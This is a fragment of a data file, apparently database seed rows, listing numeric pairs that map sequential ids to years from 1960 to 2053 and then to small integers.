(38050, 1987),
(38051, 1987),
(38052, 1987),
(38053, 1987),
(38054, 1987),
(38055, 1987),
(38056, 1987),
(38057, 1988),
(38058, 1988),
(38059, 1988),
(38060, 1988),
(38061, 1988),
(38062, 1988),
(38063, 1988),
(38064, 1989),
(38065, 1989),
(38066, 1989),
(38067, 1989),
(38068, 1989),
(38069, 1989),
(38070, 1989),
(38071, 1990),
(38072, 1990),
(38073, 1990),
(38074, 1990),
(38075, 1990),
(38076, 1990),
(38077, 1990),
(38078, 1991),
(38079, 1991),
(38080, 1991),
(38081, 1991),
(38082, 1991),
(38083, 1991),
(38084, 1991),
(38085, 1992),
(38086, 1992),
(38087, 1992),
(38088, 1992),
(38089, 1992),
(38090, 1992),
(38091, 1992),
(38092, 1993),
(38093, 1993),
(38094, 1993),
(38095, 1993),
(38096, 1993),
(38097, 1993),
(38098, 1993),
(38099, 1994),
(38100, 1994),
(38101, 1994),
(38102, 1994),
(38103, 1994),
(38104, 1994),
(38105, 1994),
(38106, 1995),
(38107, 1995),
(38108, 1995),
(38109, 1995),
(38110, 1995),
(38111, 1995),
(38112, 1995),
(38113, 1996),
(38114, 1996),
(38115, 1996),
(38116, 1996),
(38117, 1996),
(38118, 1996),
(38119, 1996),
(38120, 1996),
(38121, 1996),
(38122, 1996),
(38123, 1996),
(38124, 1997),
(38125, 1997),
(38126, 1997),
(38127, 1997),
(38128, 1997),
(38129, 1997),
(38130, 1997),
(38131, 1998),
(38132, 1998),
(38133, 1998),
(38134, 1998),
(38135, 1998),
(38136, 1998),
(38137, 1998),
(38138, 1999),
(38139, 1999),
(38140, 1999),
(38141, 1999),
(38142, 1999),
(38143, 1999),
(38144, 1999),
(38145, 2000),
(38146, 2000),
(38147, 2000),
(38148, 2000),
(38149, 2000),
(38150, 2000),
(38151, 2000),
(38152, 2001),
(38153, 2001),
(38154, 2001),
(38155, 2001),
(38156, 2001),
(38157, 2001),
(38158, 2001),
(38159, 2002),
(38160, 2002),
(38161, 2002),
(38162, 2002),
(38163, 2002),
(38164, 2002),
(38165, 2002),
(38166, 2003),
(38167, 2003),
(38168, 2003),
(38169, 2003),
(38170, 2003),
(38171, 2003),
(38172, 2003),
(38173, 2003),
(38174, 2003),
(38175, 2003),
(38176, 2003),
(38177, 2004),
(38178, 2004),
(38179, 2004),
(38180, 2004),
(38181, 2004),
(38182, 2004),
(38183, 2004),
(38184, 2005),
(38185, 2005),
(38186, 2005),
(38187, 2005),
(38188, 2005),
(38189, 2005),
(38190, 2005),
(38191, 2006),
(38192, 2006),
(38193, 2006),
(38194, 2006),
(38195, 2006),
(38196, 2006),
(38197, 2006),
(38198, 2007),
(38199, 2007),
(38200, 2007),
(38201, 2007),
(38202, 2007),
(38203, 2007),
(38204, 2007),
(38205, 2008),
(38206, 2008),
(38207, 2008),
(38208, 2008),
(38209, 2008),
(38210, 2008),
(38211, 2008),
(38212, 2009),
(38213, 2009),
(38214, 2009),
(38215, 2009),
(38216, 2009),
(38217, 2009),
(38218, 2009),
(38219, 2010),
(38220, 2010),
(38221, 2010),
(38222, 2010),
(38223, 2010),
(38224, 2010),
(38225, 2010),
(38226, 2010),
(38227, 2010),
(38228, 2010),
(38229, 2010),
(38230, 2011),
(38231, 2011),
(38232, 2011),
(38233, 2011),
(38234, 2011),
(38235, 2011),
(38236, 2011),
(38237, 2012),
(38238, 2012),
(38239, 2012),
(38240, 2012),
(38241, 2012),
(38242, 2012),
(38243, 2012),
(38244, 2013),
(38245, 2013),
(38246, 2013),
(38247, 2013),
(38248, 2013),
(38249, 2013),
(38250, 2013),
(38251, 2014),
(38252, 2014),
(38253, 2014),
(38254, 2014),
(38255, 2014),
(38256, 2014),
(38257, 2014),
(38258, 2015),
(38259, 2015),
(38260, 2015),
(38261, 2015),
(38262, 2015),
(38263, 2015),
(38264, 2015),
(38265, 2016),
(38266, 2016),
(38267, 2016),
(38268, 2016),
(38269, 2016),
(38270, 2016),
(38271, 2016),
(38272, 2016),
(38273, 2016),
(38274, 2016),
(38275, 2016),
(38276, 2017),
(38277, 2017),
(38278, 2017),
(38279, 2017),
(38280, 2017),
(38281, 2017),
(38282, 2017),
(38283, 2018),
(38284, 2018),
(38285, 2018),
(38286, 2018),
(38287, 2018),
(38288, 2018),
(38289, 2018),
(38290, 2019),
(38291, 2019),
(38292, 2019),
(38293, 2019),
(38294, 2019),
(38295, 2019),
(38296, 2019),
(38297, 2020),
(38298, 2020),
(38299, 2020),
(38300, 2020),
(38301, 2020),
(38302, 2020),
(38303, 2020),
(38304, 2021),
(38305, 2021),
(38306, 2021),
(38307, 2021),
(38308, 2021),
(38309, 2021),
(38310, 2021),
(38311, 2022),
(38312, 2022),
(38313, 2022),
(38314, 2022),
(38315, 2022),
(38316, 2022),
(38317, 2022),
(38318, 2023),
(38319, 2023),
(38320, 2023),
(38321, 2023),
(38322, 2023),
(38323, 2023),
(38324, 2023),
(38325, 2023),
(38326, 2023),
(38327, 2023),
(38328, 2023),
(38329, 2024),
(38330, 2024),
(38331, 2024),
(38332, 2024),
(38333, 2024),
(38334, 2024),
(38335, 2024),
(38336, 2025),
(38337, 2025),
(38338, 2025),
(38339, 2025),
(38340, 2025),
(38341, 2025),
(38342, 2025),
(38343, 2026),
(38344, 2026),
(38345, 2026),
(38346, 2026),
(38347, 2026),
(38348, 2026),
(38349, 2026),
(38350, 2027),
(38351, 2027),
(38352, 2027),
(38353, 2027),
(38354, 2027),
(38355, 2027),
(38356, 2027),
(38357, 2028),
(38358, 2028),
(38359, 2028),
(38360, 2028),
(38361, 2028),
(38362, 2028),
(38363, 2028),
(38364, 2029),
(38365, 2029),
(38366, 2029),
(38367, 2029),
(38368, 2029),
(38369, 2029),
(38370, 2029),
(38371, 2030),
(38372, 2030),
(38373, 2030),
(38374, 2030),
(38375, 2030),
(38376, 2030),
(38377, 2030),
(38378, 2030),
(38379, 2030),
(38380, 2030),
(38381, 2030),
(38382, 2031),
(38383, 2031),
(38384, 2031),
(38385, 2031),
(38386, 2031),
(38387, 2031),
(38388, 2031),
(38389, 2032),
(38390, 2032),
(38391, 2032),
(38392, 2032),
(38393, 2032),
(38394, 2032),
(38395, 2032),
(38396, 2033),
(38397, 2033),
(38398, 2033),
(38399, 2033),
(38400, 2033),
(38401, 2033),
(38402, 2033),
(38403, 2034),
(38404, 2034),
(38405, 2034),
(38406, 2034),
(38407, 2034),
(38408, 2034),
(38409, 2034),
(38410, 2035),
(38411, 2035),
(38412, 2035),
(38413, 2035),
(38414, 2035),
(38415, 2035),
(38416, 2035),
(38417, 2036),
(38418, 2036),
(38419, 2036),
(38420, 2036),
(38421, 2036),
(38422, 2036),
(38423, 2036),
(38424, 2037),
(38425, 2037),
(38426, 2037),
(38427, 2037),
(38428, 2037),
(38429, 2037),
(38430, 2037),
(38431, 2037),
(38432, 2037),
(38433, 2037),
(38434, 2037),
(38435, 2038),
(38436, 2038),
(38437, 2038),
(38438, 2038),
(38439, 2038),
(38440, 2038),
(38441, 2038),
(38442, 2039),
(38443, 2039),
(38444, 2039),
(38445, 2039),
(38446, 2039),
(38447, 2039),
(38448, 2039),
(38449, 2040),
(38450, 2040),
(38451, 2040),
(38452, 2040),
(38453, 2040),
(38454, 2040),
(38455, 2040),
(38456, 2041),
(38457, 2041),
(38458, 2041),
(38459, 2041),
(38460, 2041),
(38461, 2041),
(38462, 2041),
(38463, 2042),
(38464, 2042),
(38465, 2042),
(38466, 2042),
(38467, 2042),
(38468, 2042),
(38469, 2042),
(38470, 2043),
(38471, 2043),
(38472, 2043),
(38473, 2043),
(38474, 2043),
(38475, 2043),
(38476, 2043),
(38477, 2044),
(38478, 2044),
(38479, 2044),
(38480, 2044),
(38481, 2044),
(38482, 2044),
(38483, 2044),
(38484, 2045),
(38485, 2045),
(38486, 2045),
(38487, 2045),
(38488, 2045),
(38489, 2045),
(38490, 2045),
(38491, 2046),
(38492, 2046),
(38493, 2046),
(38494, 2046),
(38495, 2046),
(38496, 2046),
(38497, 2046),
(38498, 2047),
(38499, 2047),
(38500, 2047),
(38501, 2047),
(38502, 2047),
(38503, 2047),
(38504, 2047),
(38505, 2048),
(38506, 2048),
(38507, 2048),
(38508, 2048),
(38509, 2048),
(38510, 2048),
(38511, 2048),
(38512, 2049),
(38513, 2049),
(38514, 2049),
(38515, 2049),
(38516, 2049),
(38517, 2049),
(38518, 2049),
(38519, 2050),
(38520, 2050),
(38521, 2050),
(38522, 2050),
(38523, 2050),
(38524, 2050),
(38525, 2050),
(38526, 2051),
(38527, 2051),
(38528, 2051),
(38529, 2051),
(38530, 2051),
(38531, 2051),
(38532, 2051),
(38533, 2052),
(38534, 2052),
(38535, 2052),
(38536, 2052),
(38537, 2052),
(38538, 2052),
(38539, 2052),
(38540, 2053),
(38541, 2053),
(38542, 2053),
(38543, 2053),
(38544, 2053),
(38545, 2053),
(38546, 2053),
(38547, 2053),
(38548, 2053),
(38549, 2053),
(38550, 2053),
(38551, 1960),
(38552, 1961),
(38553, 1962),
(38554, 1963),
(38555, 1964),
(38556, 1965),
(38557, 1966),
(38558, 1967),
(38559, 1968),
(38560, 1969),
(38561, 1970),
(38562, 1971),
(38563, 1972),
(38564, 1973),
(38565, 1974),
(38566, 1975),
(38567, 1976),
(38568, 1977),
(38569, 1978),
(38570, 1979),
(38571, 1980),
(38572, 1981),
(38573, 1982),
(38574, 1983),
(38575, 1984),
(38576, 1985),
(38577, 1986),
(38578, 1987),
(38579, 1988),
(38580, 1989),
(38581, 1990),
(38582, 1991),
(38583, 1992),
(38584, 1993),
(38585, 1994),
(38586, 1995),
(38587, 1996),
(38588, 1997),
(38589, 1998),
(38590, 1999),
(38591, 2000),
(38592, 2001),
(38593, 2002),
(38594, 2003),
(38595, 2004),
(38596, 2005),
(38597, 2006),
(38598, 2007),
(38599, 2008),
(38600, 2009),
(38601, 2010),
(38602, 2011),
(38603, 2012),
(38604, 2013),
(38605, 2014),
(38606, 2015),
(38607, 2016),
(38608, 2017),
(38609, 2018),
(38610, 2019),
(38611, 2020),
(38612, 2021),
(38613, 2022),
(38614, 2023),
(38615, 2024),
(38616, 2025),
(38617, 2026),
(38618, 2027),
(38619, 2028),
(38620, 2029),
(38621, 2030),
(38622, 2031),
(38623, 2032),
(38624, 2033),
(38625, 2034),
(38626, 2035),
(38627, 2036),
(38628, 2037),
(38629, 2038),
(38630, 2039),
(38631, 2040),
(38632, 2041),
(38633, 2042),
(38634, 2043),
(38635, 2044),
(38636, 2045),
(38637, 2046),
(38638, 2047),
(38639, 2048),
(38640, 2049),
(38641, 2050),
(38642, 2051),
(38643, 2052),
(38644, 2053),
(38645, 1960),
(38646, 1960),
(38647, 1960),
(38648, 1960),
(38649, 1960),
(38650, 1960),
(38651, 1961),
(38652, 1961),
(38653, 1961),
(38654, 1961),
(38655, 1961),
(38656, 1961),
(38657, 1962),
(38658, 1962),
(38659, 1962),
(38660, 1962),
(38661, 1962),
(38662, 1962),
(38663, 1963),
(38664, 1963),
(38665, 1963),
(38666, 1963),
(38667, 1963),
(38668, 1963),
(38669, 1964),
(38670, 1964),
(38671, 1964),
(38672, 1964),
(38673, 1964),
(38674, 1964),
(38675, 1964),
(38676, 1964),
(38677, 1964),
(38678, 1965),
(38679, 1965),
(38680, 1965),
(38681, 1965),
(38682, 1965),
(38683, 1965),
(38684, 1966),
(38685, 1966),
(38686, 1966),
(38687, 1966),
(38688, 1966),
(38689, 1966),
(38690, 1967),
(38691, 1967),
(38692, 1967),
(38693, 1967),
(38694, 1967),
(38695, 1967),
(38696, 1968),
(38697, 1968),
(38698, 1968),
(38699, 1968),
(38700, 1968),
(38701, 1968),
(38702, 1969),
(38703, 1969),
(38704, 1969),
(38705, 1969),
(38706, 1969),
(38707, 1969),
(38708, 1970),
(38709, 1970),
(38710, 1970),
(38711, 1970),
(38712, 1970),
(38713, 1970),
(38714, 1971),
(38715, 1971),
(38716, 1971),
(38717, 1971),
(38718, 1971),
(38719, 1971),
(38720, 1972),
(38721, 1972),
(38722, 1972),
(38723, 1972),
(38724, 1972),
(38725, 1972),
(38726, 1973),
(38727, 1973),
(38728, 1973),
(38729, 1973),
(38730, 1973),
(38731, 1973),
(38732, 1974),
(38733, 1974),
(38734, 1974),
(38735, 1974),
(38736, 1974),
(38737, 1974),
(38738, 1975),
(38739, 1975),
(38740, 1975),
(38741, 1975),
(38742, 1975),
(38743, 1975),
(38744, 1976),
(38745, 1976),
(38746, 1976),
(38747, 1976),
(38748, 1976),
(38749, 1976),
(38750, 1977),
(38751, 1977),
(38752, 1977),
(38753, 1977),
(38754, 1977),
(38755, 1977),
(38756, 1978),
(38757, 1978),
(38758, 1978),
(38759, 1978),
(38760, 1978),
(38761, 1978),
(38762, 1979),
(38763, 1979),
(38764, 1979),
(38765, 1979),
(38766, 1979),
(38767, 1979),
(38768, 1980),
(38769, 1980),
(38770, 1980),
(38771, 1980),
(38772, 1980),
(38773, 1980),
(38774, 1980),
(38775, 1980),
(38776, 1980),
(38777, 1981),
(38778, 1981),
(38779, 1981),
(38780, 1981),
(38781, 1981),
(38782, 1981),
(38783, 1982),
(38784, 1982),
(38785, 1982),
(38786, 1982),
(38787, 1982),
(38788, 1982),
(38789, 1983),
(38790, 1983),
(38791, 1983),
(38792, 1983),
(38793, 1983),
(38794, 1983),
(38795, 1984),
(38796, 1984),
(38797, 1984),
(38798, 1984),
(38799, 1984),
(38800, 1984),
(38801, 1985),
(38802, 1985),
(38803, 1985),
(38804, 1985),
(38805, 1985),
(38806, 1985),
(38807, 1986),
(38808, 1986),
(38809, 1986),
(38810, 1986),
(38811, 1986),
(38812, 1986),
(38813, 1987),
(38814, 1987),
(38815, 1987),
(38816, 1987),
(38817, 1987),
(38818, 1987),
(38819, 1988),
(38820, 1988),
(38821, 1988),
(38822, 1988),
(38823, 1988),
(38824, 1988),
(38825, 1989),
(38826, 1989),
(38827, 1989),
(38828, 1989),
(38829, 1989),
(38830, 1989),
(38831, 1990),
(38832, 1990),
(38833, 1990),
(38834, 1990),
(38835, 1990),
(38836, 1990),
(38837, 1991),
(38838, 1991),
(38839, 1991),
(38840, 1991),
(38841, 1991),
(38842, 1991),
(38843, 1992),
(38844, 1992),
(38845, 1992),
(38846, 1992),
(38847, 1992),
(38848, 1992),
(38849, 1993),
(38850, 1993),
(38851, 1993),
(38852, 1993),
(38853, 1993),
(38854, 1993),
(38855, 1994),
(38856, 1994),
(38857, 1994),
(38858, 1994),
(38859, 1994),
(38860, 1994),
(38861, 1995),
(38862, 1995),
(38863, 1995),
(38864, 1995),
(38865, 1995),
(38866, 1995),
(38867, 1996),
(38868, 1996),
(38869, 1996),
(38870, 1996),
(38871, 1996),
(38872, 1996),
(38873, 1996),
(38874, 1996),
(38875, 1996),
(38876, 1997),
(38877, 1997),
(38878, 1997),
(38879, 1997),
(38880, 1997),
(38881, 1997),
(38882, 1998),
(38883, 1998),
(38884, 1998),
(38885, 1998),
(38886, 1998),
(38887, 1998),
(38888, 1999),
(38889, 1999),
(38890, 1999),
(38891, 1999),
(38892, 1999),
(38893, 1999),
(38894, 2000),
(38895, 2000),
(38896, 2000),
(38897, 2000),
(38898, 2000),
(38899, 2000),
(38900, 2001),
(38901, 2001),
(38902, 2001),
(38903, 2001),
(38904, 2001),
(38905, 2001),
(38906, 2002),
(38907, 2002),
(38908, 2002),
(38909, 2002),
(38910, 2002),
(38911, 2002),
(38912, 2003),
(38913, 2003),
(38914, 2003),
(38915, 2003),
(38916, 2003),
(38917, 2003),
(38918, 2003),
(38919, 2003),
(38920, 2003),
(38921, 2004),
(38922, 2004),
(38923, 2004),
(38924, 2004),
(38925, 2004),
(38926, 2004),
(38927, 2005),
(38928, 2005),
(38929, 2005),
(38930, 2005),
(38931, 2005),
(38932, 2005),
(38933, 2006),
(38934, 2006),
(38935, 2006),
(38936, 2006),
(38937, 2006),
(38938, 2006),
(38939, 2007),
(38940, 2007),
(38941, 2007),
(38942, 2007),
(38943, 2007),
(38944, 2007),
(38945, 2008),
(38946, 2008),
(38947, 2008),
(38948, 2008),
(38949, 2008),
(38950, 2008),
(38951, 2009),
(38952, 2009),
(38953, 2009),
(38954, 2009),
(38955, 2009),
(38956, 2009),
(38957, 2010),
(38958, 2010),
(38959, 2010),
(38960, 2010),
(38961, 2010),
(38962, 2010),
(38963, 2010),
(38964, 2010),
(38965, 2010),
(38966, 2011),
(38967, 2011),
(38968, 2011),
(38969, 2011),
(38970, 2011),
(38971, 2011),
(38972, 2012),
(38973, 2012),
(38974, 2012),
(38975, 2012),
(38976, 2012),
(38977, 2012),
(38978, 2013),
(38979, 2013),
(38980, 2013),
(38981, 2013),
(38982, 2013),
(38983, 2013),
(38984, 2014),
(38985, 2014),
(38986, 2014),
(38987, 2014),
(38988, 2014),
(38989, 2014),
(38990, 2015),
(38991, 2015),
(38992, 2015),
(38993, 2015),
(38994, 2015),
(38995, 2015),
(38996, 2016),
(38997, 2016),
(38998, 2016),
(38999, 2016),
(39000, 2016),
(39001, 2016),
(39002, 2016),
(39003, 2016),
(39004, 2016),
(39005, 2017),
(39006, 2017),
(39007, 2017),
(39008, 2017),
(39009, 2017),
(39010, 2017),
(39011, 2018),
(39012, 2018),
(39013, 2018),
(39014, 2018),
(39015, 2018),
(39016, 2018),
(39017, 2019),
(39018, 2019),
(39019, 2019),
(39020, 2019),
(39021, 2019),
(39022, 2019),
(39023, 2020),
(39024, 2020),
(39025, 2020),
(39026, 2020),
(39027, 2020),
(39028, 2020),
(39029, 2021),
(39030, 2021),
(39031, 2021),
(39032, 2021),
(39033, 2021),
(39034, 2021),
(39035, 2022),
(39036, 2022),
(39037, 2022),
(39038, 2022),
(39039, 2022),
(39040, 2022),
(39041, 2023),
(39042, 2023),
(39043, 2023),
(39044, 2023),
(39045, 2023),
(39046, 2023),
(39047, 2023),
(39048, 2023),
(39049, 2023),
(39050, 2024),
(39051, 2024),
(39052, 2024),
(39053, 2024),
(39054, 2024),
(39055, 2024),
(39056, 2025),
(39057, 2025),
(39058, 2025),
(39059, 2025),
(39060, 2025),
(39061, 2025),
(39062, 2026),
(39063, 2026),
(39064, 2026),
(39065, 2026),
(39066, 2026),
(39067, 2026),
(39068, 2027),
(39069, 2027),
(39070, 2027),
(39071, 2027),
(39072, 2027),
(39073, 2027),
(39074, 2028),
(39075, 2028),
(39076, 2028),
(39077, 2028),
(39078, 2028),
(39079, 2028),
(39080, 2029),
(39081, 2029),
(39082, 2029),
(39083, 2029),
(39084, 2029),
(39085, 2029),
(39086, 2030),
(39087, 2030),
(39088, 2030),
(39089, 2030),
(39090, 2030),
(39091, 2030),
(39092, 2030),
(39093, 2030),
(39094, 2030),
(39095, 2031),
(39096, 2031),
(39097, 2031),
(39098, 2031),
(39099, 2031),
(39100, 2031),
(39101, 2032),
(39102, 2032),
(39103, 2032),
(39104, 2032),
(39105, 2032),
(39106, 2032),
(39107, 2033),
(39108, 2033),
(39109, 2033),
(39110, 2033),
(39111, 2033),
(39112, 2033),
(39113, 2034),
(39114, 2034),
(39115, 2034),
(39116, 2034),
(39117, 2034),
(39118, 2034),
(39119, 2035),
(39120, 2035),
(39121, 2035),
(39122, 2035),
(39123, 2035),
(39124, 2035),
(39125, 2036),
(39126, 2036),
(39127, 2036),
(39128, 2036),
(39129, 2036),
(39130, 2036),
(39131, 2037),
(39132, 2037),
(39133, 2037),
(39134, 2037),
(39135, 2037),
(39136, 2037),
(39137, 2037),
(39138, 2037),
(39139, 2037),
(39140, 2038),
(39141, 2038),
(39142, 2038),
(39143, 2038),
(39144, 2038),
(39145, 2038),
(39146, 2039),
(39147, 2039),
(39148, 2039),
(39149, 2039),
(39150, 2039),
(39151, 2039),
(39152, 2040),
(39153, 2040),
(39154, 2040),
(39155, 2040),
(39156, 2040),
(39157, 2040),
(39158, 2041),
(39159, 2041),
(39160, 2041),
(39161, 2041),
(39162, 2041),
(39163, 2041),
(39164, 2042),
(39165, 2042),
(39166, 2042),
(39167, 2042),
(39168, 2042),
(39169, 2042),
(39170, 2043),
(39171, 2043),
(39172, 2043),
(39173, 2043),
(39174, 2043),
(39175, 2043),
(39176, 2044),
(39177, 2044),
(39178, 2044),
(39179, 2044),
(39180, 2044),
(39181, 2044),
(39182, 2045),
(39183, 2045),
(39184, 2045),
(39185, 2045),
(39186, 2045),
(39187, 2045),
(39188, 2046),
(39189, 2046),
(39190, 2046),
(39191, 2046),
(39192, 2046),
(39193, 2046),
(39194, 2047),
(39195, 2047),
(39196, 2047),
(39197, 2047),
(39198, 2047),
(39199, 2047),
(39200, 2048),
(39201, 2048),
(39202, 2048),
(39203, 2048),
(39204, 2048),
(39205, 2048),
(39206, 2049),
(39207, 2049),
(39208, 2049),
(39209, 2049),
(39210, 2049),
(39211, 2049),
(39212, 2050),
(39213, 2050),
(39214, 2050),
(39215, 2050),
(39216, 2050),
(39217, 2050),
(39218, 2051),
(39219, 2051),
(39220, 2051),
(39221, 2051),
(39222, 2051),
(39223, 2051),
(39224, 2052),
(39225, 2052),
(39226, 2052),
(39227, 2052),
(39228, 2052),
(39229, 2052),
(39230, 2053),
(39231, 2053),
(39232, 2053),
(39233, 2053),
(39234, 2053),
(39235, 2053),
(39236, 2053),
(39237, 2053),
(39238, 2053),
(39239, 1960),
(39240, 1960),
(39241, 1961),
(39242, 1961),
(39243, 1962),
(39244, 1962),
(39245, 1963),
(39246, 1963),
(39247, 1964),
(39248, 1965),
(39249, 1965),
(39250, 1966),
(39251, 1966),
(39252, 1967),
(39253, 1967),
(39254, 1968),
(39255, 1968),
(39256, 1969),
(39257, 1969),
(39258, 1970),
(39259, 1970),
(39260, 1971),
(39261, 1971),
(39262, 1972),
(39263, 1972),
(39264, 1973),
(39265, 1973),
(39266, 1974),
(39267, 1974),
(39268, 1975),
(39269, 1975),
(39270, 1976),
(39271, 1976),
(39272, 1977),
(39273, 1977),
(39274, 1978),
(39275, 1978),
(39276, 1979),
(39277, 1979),
(39278, 1980),
(39279, 1981),
(39280, 1981),
(39281, 1982),
(39282, 1982),
(39283, 1983),
(39284, 1983),
(39285, 1984),
(39286, 1984),
(39287, 1985),
(39288, 1985),
(39289, 1986),
(39290, 1986),
(39291, 1987),
(39292, 1987),
(39293, 1988),
(39294, 1988),
(39295, 1989),
(39296, 1989),
(39297, 1990),
(39298, 1990),
(39299, 1991),
(39300, 1991),
(39301, 1992),
(39302, 1992),
(39303, 1993),
(39304, 1993),
(39305, 1994),
(39306, 1994),
(39307, 1995),
(39308, 1995),
(39309, 1996),
(39310, 1997),
(39311, 1997),
(39312, 1998),
(39313, 1998),
(39314, 1999),
(39315, 1999),
(39316, 2000),
(39317, 2000),
(39318, 2001),
(39319, 2001),
(39320, 2002),
(39321, 2002),
(39322, 2003),
(39323, 2004),
(39324, 2004),
(39325, 2005),
(39326, 2005),
(39327, 2006),
(39328, 2006),
(39329, 2007),
(39330, 2007),
(39331, 2008),
(39332, 2008),
(39333, 2009),
(39334, 2009),
(39335, 2010),
(39336, 2011),
(39337, 2011),
(39338, 2012),
(39339, 2012),
(39340, 2013),
(39341, 2013),
(39342, 2014),
(39343, 2014),
(39344, 2015),
(39345, 2015),
(39346, 2016),
(39347, 2017),
(39348, 2017),
(39349, 2018),
(39350, 2018),
(39351, 2019),
(39352, 2019),
(39353, 2020),
(39354, 2020),
(39355, 2021),
(39356, 2021),
(39357, 2022),
(39358, 2022),
(39359, 2023),
(39360, 2024),
(39361, 2024),
(39362, 2025),
(39363, 2025),
(39364, 2026),
(39365, 2026),
(39366, 2027),
(39367, 2027),
(39368, 2028),
(39369, 2028),
(39370, 2029),
(39371, 2029),
(39372, 2030),
(39373, 2031),
(39374, 2031),
(39375, 2032),
(39376, 2032),
(39377, 2033),
(39378, 2033),
(39379, 2034),
(39380, 2034),
(39381, 2035),
(39382, 2035),
(39383, 2036),
(39384, 2036),
(39385, 2037),
(39386, 2038),
(39387, 2038),
(39388, 2039),
(39389, 2039),
(39390, 2040),
(39391, 2040),
(39392, 2041),
(39393, 2041),
(39394, 2042),
(39395, 2042),
(39396, 2043),
(39397, 2043),
(39398, 2044),
(39399, 2044),
(39400, 2045),
(39401, 2045),
(39402, 2046),
(39403, 2046),
(39404, 2047),
(39405, 2047),
(39406, 2048),
(39407, 2048),
(39408, 2049),
(39409, 2049),
(39410, 2050),
(39411, 2050),
(39412, 2051),
(39413, 2051),
(39414, 2052),
(39415, 2052),
(39416, 2053),
(39417, 60),
(39418, 61),
(39419, 62),
(39420, 63),
(39421, 64),
(39422, 65),
(39423, 66),
(39424, 67),
(39425, 68),
(39426, 69),
(39427, 70),
(39428, 71),
(39429, 72),
(39430, 73),
(39431, 74),
(39432, 75),
(39433, 76),
(39434, 77),
(39435, 78),
(39436, 79),
(39437, 80),
(39438, 81),
(39439, 82),
(39440, 83),
(39441, 84),
(39442, 85),
(39443, 86),
(39444, 87),
(39445, 88),
(39446, 89),
(39447, 90),
(39448, 91),
(39449, 92),
(39450, 93),
(39451, 94),
(39452, 95),
(39453, 96),
(39454, 97),
(39455, 98),
(39456, 99),
(39457, 100),
(39458, 101),
(39459, 102),
(39460, 103),
(39461, 104),
(39462, 105),
(39463, 106),
(39464, 107),
(39465, 108),
(39466, 109),
(39467, 110),
(39468, 111),
(39469, 112),
(39470, 113),
(39471, 114),
(39472, 115),
(39473, 116),
(39474, 117),
(39475, 118),
(39476, 119),
(39477, 120),
(39478, 121),
(39479, 122),
(39480, 123),
(39481, 124),
(39482, 125),
(39483, 126),
(39484, 127),
(39485, 128),
(39486, 129),
(39487, 130),
(39488, 131),
(39489, 132),
(39490, 133),
(39491, 134),
(39492, 135),
(39493, 136),
(39494, 137),
(39495, 138),
(39496, 139),
(39497, 140),
(39498, 141),
(39499, 142),
(39500, 143),
(39501, 144),
(39502, 145),
(39503, 146),
(39504, 147),
(39505, 148),
(39506, 149),
(39507, 150),
(39508, 151),
(39509, 152),
(39510, 153),
(39511, 154),
(39512, 155),
(39513, 156),
(39514, 157),
(39515, 158),
(39516, 159),
(39517, 160),
(39518, 161),
(39519, 162),
(39520, 163),
(39521, 164),
(39522, 165),
(39523, 166),
(39524, 167),
(39525, 168),
(39526, 169),
(39527, 170),
(39528, 171),
(39529, 172),
(39530, 173),
(39531, 174),
(39532, 175),
(39533, 176),
(39534, 177),
(39535, 178),
(39536, 179),
(39537, 180),
(39538, 181),
(39539, 182),
(39540, 183),
(39541, 184),
(39542, 185),
(39543, 186),
(39544, 187),
(39545, 188),
(39546, 189),
(39547, 190),
(39548, 191),
(39549, 192),
(39550, 193),
(39551, 194),
(39552, 195),
(39553, 196),
(39554, 197),
(39555, 198),
(39556, 199),
(39557, 200),
(39558, 201),
(39559, 202),
(39560, 203),
(39561, 204),
(39562, 205),
(39563, 206),
(39564, 207),
(39565, 208),
(39566, 209),
(39567, 210),
(39568, 211),
(39569, 212),
(39570, 213),
(39571, 214),
(39572, 215),
(39573, 216),
(39574, 217),
(39575, 218),
(39576, 219),
(39577, 220),
(39578, 221),
(39579, 222),
(39580, 223),
(39581, 224),
(39582, 225),
(39583, 226),
(39584, 227),
(39585, 228),
(39586, 229),
(39587, 230),
(39588, 231),
(39589, 232),
(39590, 233),
(39591, 234),
(39592, 235),
(39593, 236),
(39594, 237),
(39595, 238),
(39596, 239),
(39597, 240),
(39598, 241),
(39599, 242),
(39600, 243),
(39601, 244),
(39602, 245),
(39603, 246),
(39604, 247),
(39605, 248),
(39606, 249),
(39607, 250),
(39608, 251),
(39609, 252),
(39610, 253),
(39611, 254),
(39612, 255),
(39613, 256),
(39614, 257),
(39615, 258),
(39616, 259),
(39617, 260),
(39618, 261),
(39619, 262),
(39620, 263),
(39621, 264),
(39622, 265),
(39623, 266),
(39624, 267),
(39625, 268),
(39626, 269),
(39627, 270),
(39628, 271),
(39629, 272),
(39630, 273),
(39631, 274),
(39632, 275),
(39633, 276),
(39634, 277),
(39635, 278),
(39636, 279),
(39637, 280),
(39638, 281),
(39639, 282),
(39640, 283),
(39641, 284),
(39642, 285),
(39643, 286),
(39644, 287),
(39645, 288),
(39646, 289),
(39647, 290),
(39648, 291),
(39649, 292),
(39650, 293),
(39651, 294),
(39652, 295),
(39653, 296),
(39654, 297),
(39655, 298),
(39656, 299),
(39657, 300),
(39658, 301),
(39659, 302),
(39660, 303),
(39661, 304),
(39662, 305),
(39663, 306),
(39664, 307),
(39665, 308),
(39666, 309),
(39667, 310),
(39668, 311),
(39669, 312),
(39670, 313),
(39671, 314),
(39672, 315),
(39673, 316),
(39674, 317),
(39675, 318),
(39676, 319),
(39677, 320),
(39678, 321),
(39679, 322),
(39680, 323),
(39681, 324),
(39682, 325),
(39683, 326),
(39684, 327),
(39685, 328),
(39686, 329),
(39687, 330),
(39688, 331),
(39689, 332),
(39690, 333),
(39691, 334),
(39692, 335),
(39693, 336),
(39694, 337),
(39695, 338),
(39696, 339),
(39697, 340),
(39698, 341),
(39699, 342),
(39700, 343),
(39701, 344),
(39702, 345),
(39703, 346),
(39704, 347),
(39705, 348),
(39706, 349),
(39707, 350),
(39708, 351),
(39709, 352),
(39710, 353),
(39711, 354),
(39712, 355),
(39713, 356),
(39714, 357),
(39715, 358),
(39716, 359),
(39717, 360),
(39718, 361),
(39719, 362),
(39720, 363),
(39721, 364),
(39722, 365),
(39723, 366),
(39724, 367),
(39725, 368),
(39726, 369),
(39727, 370),
(39728, 371),
(39729, 372),
(39730, 373),
(39731, 374),
(39732, 375),
(39733, 376),
(39734, 377),
(39735, 378),
(39736, 379),
(39737, 380),
(39738, 381),
(39739, 382),
(39740, 383),
(39741, 384),
(39742, 385),
(39743, 386),
(39744, 387),
(39745, 388),
(39746, 389),
(39747, 390),
(39748, 391),
(39749, 392),
(39750, 393),
(39751, 394),
(39752, 395),
(39753, 396),
